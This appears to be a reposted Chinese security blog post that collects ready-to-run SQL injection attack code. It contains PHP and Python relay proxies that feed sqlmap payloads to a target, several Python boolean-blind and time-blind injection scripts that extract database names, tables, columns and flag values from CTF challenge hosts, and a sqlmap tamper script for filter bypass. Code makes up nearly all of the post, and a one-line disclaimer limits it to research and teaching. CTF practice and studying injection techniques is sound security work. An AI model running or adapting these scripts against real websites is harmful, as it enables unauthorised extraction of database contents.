[huayang]
有绕过请自行更改
中转注入
PHP版
简洁版
<?php
$id=base64_encode("id=".$_GET['id']);
echo file_get_contents("http://xxx.com/sqli.php?{$id}"); //sqli.php是原网页
?>正式版
<?php
function encode($id){
$id = $id.'hxb2018';
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
$data = base64_encode(base64_encode(mcrypt_generic($td,$id)));
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
return $data;
}
$url = 'http://47.107.236.42:49882/news/list.php?id=';
$param = encode($_GET['id']);
$response = file_get_contents($url.$param);
echo $response;
?>
<?php
//先开启php.ini 中的extension=php_curl.dll
set_time_limit(1);
$curl = curl_init();//初始化curl
$id = $_GET['id'];
//替换id空格和=
$id = str_replace(" ","%20",$id);
$id = str_replace("=","%3D",$id);
$url = "http://xxx.com/aaa.php";
// 设置目标URL
curl_setopt($curl, CURLOPT_URL, $url);
// 设置header
curl_setopt($curl, CURLOPT_HEADER, 0);
// 设置cURL 参数,要求结果保存到字符串中还是输出到屏幕上。
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 0);
// 运行cURL,请求网页
$data = curl_exec($curl);
// 关闭URL请求
curl_close($curl);
?>Python版
from flask import Flask
from flask import request
from selenium import webdriver
driver_path = "C:/Users/Administrator/AppData/Local/Programs/Python/Python37/Lib/site-packages/selenium/webdriver/chrome/chromedriver.exe"
chrome = webdriver.Chrome(driver_path)
chrome.get("http://127.0.0.1")#目标注入点
app = Flask(__name__)
def send(payload):
#起到中转payload效果。
chrome.find_element_by_id("username").send_keys(payload) #把payload填到有注入点的地方
chrome.find_element_by_id("password").send_keys("aaaa")
chrome.find_element_by_id("submit").click()
return "plase see flask server!" #随便返回一下不重要
@app.route('/')
def index():
# 接收sqlmap传递过来的payload
payload = request.args.get("payload")
return send(payload)
if __name__ == "__main__":
app.run()布尔盲注
#!/usr/bin/env python
"""
Author: huayang
"""
import requests
urls = 'http://478951db-f91e-4a82-9941-c35a7c3ee800.chall.ctf.show/index.php?id=-1/**/or/**/'
true = ' turning'
name = ''
for number1 in range(50): # 猜flag位数
for number2 in range(44, 126): # ASCII 字符0 ~ }
# # 库
# url = urls + 'ascii(substr(database() from %d for 1))=%d' % (number1, number2)
# #表
# url = urls + 'ascii(substr((selectgroup_concat(table_name) from information_schema.tables where table_schema=database())%d,1))=%d' % (number1,number2)
#字段
# url = urls + 'ascii(substr((selectcolumn_name from information_schema.columns where table_name="flag" limit 0,1),%d,1))=%d' % (number1,number2)
#字段信息
url = urls + 'ascii(substr((select flag from flag)from %d for 1))=%d' % (number1,number2)
response = requests.get(url)
if true in response.text:
name += chr(number2) # chr()返回 ASCII 字符
print(name, '...')
break
print('\n>>>flag=', name, '<<<\n')版本二
#!/usr/bin/env python
"""
Author: huayang
"""
import requests
urls = 'http://challenge-f99d8d9361e35dff.sandbox.ctfhub.com:10080/?id='
true = 'query_success'
#库名
def database_name():
name = ''
for number in range(1,8):#猜测数据库库名的长度
for letter in 'qwertyuioplkjhgfdsazxcvb':#可以想象为一个字典,用所有字母一个个去试,正确返回,错误返回select table_name from information_schema.tables,则会报错
url = urls + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
number, letter)#%d整型%s字符串
response = requests.get(url)
if true in response.text:#判断response.text里面是否有true
name = name + letter
print(name,'...')
break#终止本次循环
print('\n>>>database_name=',name,'<<<\n')
# database_name()
#表名
def table_name():
list = []
for number1 in range(3):#猜有3个表
name = ''
for number2 in range(1,8):
for letter in 'qwertyuioplkjhgfdsazxcvbnm':
url = urls + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
number1, number2, letter)
print(url)
response = requests.get(url)
if true in response.text:
name = name + letter
print(name,'...')
break
list.append(name)
print('\n>>>table_name=', list,'<<<\n')
table_name()
#字段名
def column_name():
list = []
for number1 in range(3): # 判断表里最多有4个字段
name = ''
for number2 in range(1,8): # 判断一个 字段名最多有9个字符组成
for letter in 'qwertyuioplkjhgfdsazxcvbnm':
url = urls + 'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
number1, number2, letter)
response = requests.get(url)
if true in response.text:
name = name + letter
print(name,'...')
break
list.append(name)
print('\n>>>column_name=', list,'<<<\n')
# column_name()
#字段信息
def get_flag():
name = ''
for number1 in range(50): #猜flag位数
for number2 in range(48, 126): #ASCII 字符0 ~ }
url = urls + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (
number1, number2)
response = requests.get(url)
if true in response.text:
name = name + chr(number2)#chr()返回 ASCII 字符
print(name,'...')
break
print('\n>>>flag=',name,'<<<\n')
# get_flag()
运用lift进行截取
import requests
url = 'http://4a1c1083-75e8-4cf2-92d8-55cda4100937.node3.buuoj.cn/Less-8/?id='
flag = ''
for number in range(1,10):
for letter in range(33,126):
payload0 = flag + '%s' % (chr(letter))
payload = "1' and left(database()," + str(number) + ")=" + "\'" + payload0 + "\'" + '--+'
response = requests.get(url + payload)
if 'You' in response.text:
flag += chr(letter)
print(flag.lower())
break
print(flag)
时间盲注
版本一
#!/usr/bin/env python
"""
Author: huayang
"""
import requests
import time
url = "http://01dcd092-b929-4a5c-be0b-1ad5bffe1292.chall.ctf.show/api/"
name = ''
for number1 in range(1,50):
for number2 in range(45,126):
#payload = f'if(substr(database(),{number1},1) = "{chr(number2)}",sleep(1),1)'#可以忽略这步,把这里爆出得库加在下面的database()和table_schema可能会更加准确
#payload = f'if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{number1},1) = "{chr(number2)}",sleep(2),1)'
#payload = f'if(substr((select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagx" and table_schema="ctfshow_web"),{number1},1) = "{chr(number2)}",sleep(2),1)'
payload = f"if(substr((select flaga from ctfshow_flagx),{number1},1) = '{chr(number2)}',sleep(1),1)"
data = {
'ip':payload,
'debug':'0'
}
# current1_time = time.time()
response = requests.post(url,data=data)
#新姿势
time = response.elapsed.total_seconds()#获取响应时间,单位s
# current2_time = time.time()
# current = current2_time - current1_time
if time >= 1:
name = name + chr(number2)
print(str.lower(name))
break仔细看还是可以用的
版本二
#!/usr/bin/env python
"""
Author: huayang
"""
import requests
import time
url = "http://01dcd092-b929-4a5c-be0b-1ad5bffe1292.chall.ctf.show/api/"
name = ''
for i in range(4):#表或字段的数量
for number1 in range(1,50):
for number2 in range(45,126):
#payload = f'if(substr(database(),{number1},1) = "{chr(number2)}",sleep(1),1)'
#payload = f'if(substr((select table_name from information_schema.tables where table_schema=database() limit {i},1),{number1},1) = "{chr(number2)}",sleep(1),1)'
payload = f'if(substr((select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagx" limit {i},1),{number1},1) = "{chr(number2)}",sleep(2),1)'
#payload = f"if(substr((select flaga from ctfshow_flagx),{number1},1) = '{chr(number2)}',sleep(1),1)"
data = {
'ip':payload,
'debug':'0'
}
# current1_time = time.time()
response = requests.post(url,data=data)
#新姿势
time = response.elapsed.total_seconds()#获取响应时间,单位s
# current2_time = time.time()
# current = current2_time - current1_time
if time >= 1:
name = name + chr(number2)
print(str.lower(name))
break下面那个版本应该可以避免此类状况
版本三 字符型注入
#!/usr/bin/env python
"""
Author: huayang
"""
import requests
import time
url = "http://c6778fe7-8d66-4e93-a617-efcdb0c32c18.chall.ctf.show/api/"
name = ''
for number1 in range(1,50):
for number2 in range(45,126):
#payload = f"1' or if(substr(database(),{number1},1) = '{chr(number2)}',sleep(1),1) and '1'='1"#可以忽略这步,把这里爆出得库加在下面的database()和table_schema可能会更加准确
#payload = f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{number1},1) = '{chr(number2)}',sleep(2),1) and '1'='1"
#payload = f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc' and table_schema='ctfshow_web'),{number1},1) = '{chr(number2)}',sleep(2),1) and '1'='1"
payload = f"1' or if(substr((select flagaa from ctfshow_flagxc),{number1},1) = '{chr(number2)}',sleep(1),1) and '1'='1"
data = {
'ip':payload,
'debug':'0'
}
# current1_time = time.time()
response = requests.post(url,data=data)
#新姿势
time = response.elapsed.total_seconds()#获取响应时间,单位s
# current2_time = time.time()
# current = current2_time - current1_time
if time >= 1:
name = name + chr(number2)
print(str.lower(name))
break
版本四
#!/usr/bin/env python
"""
Author: huayang
"""
import requests, time
urls = 'http://challenge-f8fcb03f18fbc00a.sandbox.ctfhub.com:10080/?id='
def database_name():
name = ''
for number in range(8):
for letter in 'qwertyuioplkjhgfdsazxcvbnm':
url = urls + 'if(substr(database(),%d,1) = "%s",sleep(1),1)' % (number, letter)
current1_time = time.time()
response = requests.get(url)
current2_time = time.time()
current = current2_time - current1_time
if current > 1:#cao'cao'cao'cao'coa'coa'o'ca'o'ca'o'o'cao'co'ao'c
name = name + letter
print(name)
break
print(name)
def table_name():
array = []
for number1 in range(4):
name = ''
for number2 in range(8):
for letter in 'qwertyuioplkjhgfdsazxcvbnm':
url = urls + 'if(substr((select table_name from information_schema.tables where table_schema="sqli" limit %d,1),%d,1) = "%s",sleep(1),1)' % (
number1, number2, letter)
current1_time = time.time()
response = requests.get(url)
current2_time = time.time()
current = current2_time - current1_time
if current > 1:
name = name + letter
print(name)
break
array.append(name)
print(array)
def column_name():
name = ''
for number2 in range(8):
for letter in 'qwertyuioplkjhgfdsazxcvbnm':
url = urls + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema="sqli"),%d,1) = "%s",sleep(1),1)' % (
number2, letter)
current1_time = time.time()
response = requests.get(url)
current2_time = time.time()
current = current2_time - current1_time
if current > 1:
name = name + letter
print(name)
break
print(name)
def flag():
name = ''
for number1 in range(1, 50):
for number2 in range(48, 126):
url = urls + 'if(substr((select flag from sqli.flag),%d,1) = "%s",sleep(1),1)' % (number1, chr(number2))
current1_time = time.time()
response = requests.get(url)
current2_time = time.time()
current = current2_time - current1_time
if current >= 1:
name = name + chr(number2)
print(name)
break
print(name)
database_name()
# table_name()
# column_name()
# flag()tampet
#!/usr/bin/env python
"""
Author: huayang你
"""
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
__priority__ = PRIORITY.LOW
def dependencies():
singleTimeWarnMessage("\n\n\t>>>huayang<-->bypass<<<\n")
def tamper(payload, **kwargs):
retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += chr(0x09)
continue
elif payload[i] == "*":
retVal += chr(0x31)
continue
elif payload[i] == "=":
retVal += chr(0x09) + 'LIKE' + chr(0x09)
continue
elif payload[i] == " ":
retVal += chr(0x09)
continue
elif payload[i] == "'":
retVal += '%00%27'
continue
retVal += payload[i]
return retVal[/huayang]
FROM:浅浅淡淡[hellohy]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论